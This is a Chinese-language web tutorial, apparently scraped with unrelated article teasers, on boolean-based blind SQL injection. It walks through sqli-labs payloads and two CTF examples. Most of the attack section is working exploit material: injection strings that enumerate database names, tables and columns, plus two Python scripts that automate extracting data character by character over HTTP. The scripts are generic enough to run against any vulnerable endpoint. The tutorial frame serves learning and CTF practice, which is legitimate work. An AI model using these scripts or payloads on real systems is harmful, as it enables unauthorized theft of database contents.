<em>Mac</em>Book项目 2009年学校开始实施<em>Mac</em>Book项目,所有师生配备一本<em>Mac</em>Book,并同步更新了校园无线网络。学校每周进行电脑技术更新,每月发送技术支持资料,极大改变了教学及学习方式。因此2011
2021-06-01 09:32:01
python 布林注入原理及滲透過程範例
2022-10-20 14:02:11
引文
之前有一篇文章給大家帶來了SQL隱碼攻擊的基本知識點以及分類,包含的面比較廣但是不深入,於是我準備詳細講講每一種型別的SQL隱碼攻擊的詳細利用方法以及場景,今天給大家帶來的是布林盲注,也是比較常用的一種注入方式。
基本知識
什麼是布林注入?
先了解一下什麼是布林盲注,在平常我們在網頁輸入SQL語句網頁會給我們關於SQL語句的回顯,比如SQL錯報資訊,我們根據這些錯報資訊去進行SQL隱碼攻擊,但你們有沒有想過,如果當我們傳入語句網站不會給我們回顯時,我們該怎麼辦呢,這時我們引入布林注入的概念,即通過一些判斷語句來確認資料庫的內部資訊,可以看看下面的圖:
有回顯
無回顯
下面就告訴大家如何在只有兩種回顯的頁面,利用函數來實現我們的布林盲注。
函數
下面給大家舉例一下布林盲注中常用的函數以及他們的作用:
length(str):返回str字串的長度。
substr(str, pos, len):將str從pos位置開始擷取len長度的字元進 行返回。注意這裡的pos位置是從1開始的,不是陣列的0開始
mid(str,pos,len):跟上面的一樣,擷取字串
ascii(str):返回字串str的最左面字元的ASCII程式碼值。
ord(str):同上,返回ascii碼
if(a,b,c) :a為條件,a為true,返回b,否則返回c,如if(1>2,1,0),返回0
當然這只是最常見的函數,當上面這些被禁用時,我們可以尋找其他的函數,下面給大家舉例如何利用這些函數。
根據布林型的規則,網頁只給我們返回TRUE或者FALSE,那麼我們像下面這樣進行傳參:
http://127.0.0.1/Less-8/?id=1'and (length(database()))>8 --+
判斷資料庫名字長度是否大於8,正確返回TRUE,錯誤返回FALSE。
注入過程
假如我們已經判斷完資料庫的名字長度,接下來就來猜測資料庫的第一個字母是什麼:
http://127.0.0.1/sqli-labs-master/Less-8/index.php?id=1'and ascii(substr(database(),1,1))>110#
我們可以根據二分法來進行判斷,當我們ASCII為110返回為TRUE,111時為FALSE,我們就可以判斷ASCII碼為110對應的字元為資料庫的第一個名稱。關於ASCII對應的值可以參考下面的圖:
同理我們修改匹配的資料庫欄位來查詢第二個字元:
substr(database(),2,1)
查詢出資料庫的名字為security後我們按順序查詢表名的第一個字母:
1' and (ascii(substr((select table_name from information_schema.tables where table_schema=''security limit 0,1),1,1)))>100 --+
最後得到表名為emails,於是我們查詢欄位值的第一個字母:
1' and (ascii(substr((select column_name from information_schema.columns where table_name='emails'),1,1)))>100 --+
最後得到欄位值。
大家有沒有發現如果我們一個一個的試時間成本是不是很大,於是我們可以編寫指令碼來自動迴圈跑出來。下面會給大家帶來例題。
例題
例題一
給了我們一個搜尋方塊:
我們嘗試輸入後發現,輸入1回顯Hello, glzjin wants a girlfriend,輸入2回顯Do you want to be my girlfriend?,輸入大於2的數回顯:Error Occured When Fetch Result,而且還會檢測我們語句過濾了union等關鍵字,但是沒有過濾(),考慮布林盲注。嘗試構造PAYLOAD:
id=1^(if((ascii(substr((select(flag)from(flag)),1,1))=102),0,1))
回顯正常,可以進行SQL隱碼攻擊,我們利用指令碼:
import requests
import time
import re
url='http://4f098f39-88d5-4922-afcc-06e3cfa8ac6e.node4.buuoj.cn:81/index.php'
flag = ''
for i in range(1,43):
max = 127
min = 0
for c in range(0,127):
s = (int)((max+min)/2)
payload = '0^(ascii(substr((select(flag)from(flag)),'+str(i)+',1))>'+str(s)+')'
r = requests.post(url,data = {'id':payload})
time.sleep(0.005)
if 'Hello, glzjin wants a girlfriend.' in str(r.content):
min=s
else:
max=s
if((max-min)<=1):
flag+=chr(max)
print(flag)
break
執行得到FLAG:
例題二
也是一個搜尋方塊,我們分別輸入1和1',得到以下回顯:
猜測是布林注入,我們先查詢資料庫長度:
1 and length(database()) >5
得到資料庫長度為4後,我們查詢資料庫名字:
1 and ascii(substr(database(),1,1))=115
得到庫名為sqli,接下來就是查詢表和欄位等操作了,在網上找了一個指令碼來讓他自己跑:
import requests
# 爆庫
def dataBaseName(url, mark):
name = ''
for i in range(1, 9):
for j in "sqcwertyuioplkjhgfdazxvbnm":
payload = url + "if(substr(database(),%d,1)='%s',1,0)" % (i, j)
r = requests.get(payload)
if mark in r.text:
name = name + j
print(name)
break
print('資料庫名:', name)
# 爆表
def table_name(url,mark):
tableList = []
for i in range(0,4):
name = ''
for j in range(1,9):
for k in 'sqcwertyuioplkjhgfdazxvbnm':
payload = url + 'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,0)' %(i,j,k)
r = requests.get(payload)
if mark in r.text:
name = name + k
print(name)
break
tableList.append(name)
print('table_name:',tableList)
# 爆欄位
def column_name(url,mark):
columnList = []
for i in range(0,3):
columnName = ''
for j in range(1,9):
for k in 'sqcwertyuioplkjhgfdazxvbnm':
payload = url + 'if(substr((select column_name from information_schema.columns where table_name="flag" and table_schema = database() limit %d,1),%d,1)="%s",1,0)' %(i,j,k)
r = requests.get(payload)
if mark in r.text:
columnName += k
print(columnName)
break
columnList.append(columnName)
print("欄位名:",columnList)
# 爆欄位第一個行內容
def get_data(url,mark):
data = ''
for i in range(1,50):
for j in range(48,126):
payload = url + 'if(ascii(substr((select flag from flag),%d,1))=%d,1,0)' %(i,j)
r = requests.get(payload)
if mark in r.text:
data += chr(j)
print(data)
break
print("欄位第一個值",data)
# 爆欄位前10行內容
def get_data(url,mark):
dataList = []
for i in range(1,10):
data = ''
for j in range(1,50):
for k in range(48,126):
payload = url + 'if(ASCII(SUBSTR((SELECT flag FROM `flag` limit %d,1),%d,1))=%d,1,0)' %(i,j,k)
r = requests.get(payload)
if mark in r.text:
data += chr(k)
print(data)
break
dataList.append(data)
print("欄位前10行內容",dataList)
if __name__ == "__main__":
url = "/?id="
mark = "query_success"
dataBaseName(url, mark)
table_name(url, mark)
column_name(url, mark)
get_data(url,mark)
結語
今天詳細講了布林注入的原理以及滲透過程,有興趣的小夥伴可以自己搭建靶機嘗試,文章中可能有錯誤的的地方歡迎大家指出,更多關於python 布林注入滲透的資料請關注it145.com其它相關文章!
相關文章
-
黑科技的輕簡出行,告別「電量焦慮症」:Anker氮化鎵超能充系列
综合看Anker超能充系列的性价比很高,并且与不仅和iPhone12/苹果<em>Mac</em>Book很配,而且适合多设备充电需求的日常使用或差旅场景,不管是安卓还是Switch同样也能用得上它,希望这次分享能给准备购入充电器的小伙伴们有所
2021-06-01 09:31:42
-
吳亦凡廠牌首秀,L4WUDU居然忘詞了,Rapper和明星比還是有差距!
除了L4WUDU与吴亦凡已经多次共事,成为了明面上的厂牌成员,吴亦凡还曾带领20XXCLUB全队参加2020年的一场音乐节,这也是20XXCLUB首次全员合照,王嗣尧Turbo、陈彦希Regi、<em>Mac</em> Ova Seas、林渝植等人全部出场。然而让
2021-06-01 09:31:34
-
IPFS、Chia、Bzz和ICP挖礦該怎麼選?哪一個更有優勢?
目前应用IPFS的机构:1 谷歌<em>浏览器</em>支持IPFS分布式协议 2 万维网 (历史档案博物馆)数据库 3 火狐<em>浏览器</em>支持 IPFS分布式协议 4 EOS 等数字货币数据存储 5 美国国会图书馆,历史资料永久保存在 IPFS 6 加
2021-06-01 09:31:24
-
有哪些事是買了雪佛蘭後才知道的?美事偷著樂,開拓者車主隨聊
开拓者的车机是兼容苹果和<em>安卓</em>,虽然我不怎么用,但确实兼顾了我家人的很多需求:副驾的门板还配有解锁开关,有的时候老婆开车,下车的时候偶尔会忘记解锁,我在副驾驶可以自己开门:第二排设计很好,不仅配置了一个很大的
2021-06-01 09:30:48
-
iPhone12在618最新定價,跌價幅度超過1400元,還等iPhone13嗎?
不仅是<em>安卓</em>手机,苹果手机的降价力度也是前所未有了,iPhone12也“跳水价”了,发布价是6799元,如今已经跌至5308元,降价幅度超过1400元,最新定价确认了。iPhone12是苹果首款5G手机,同时也是全球首款5nm芯片的智能机,它
2021-06-01 09:30:45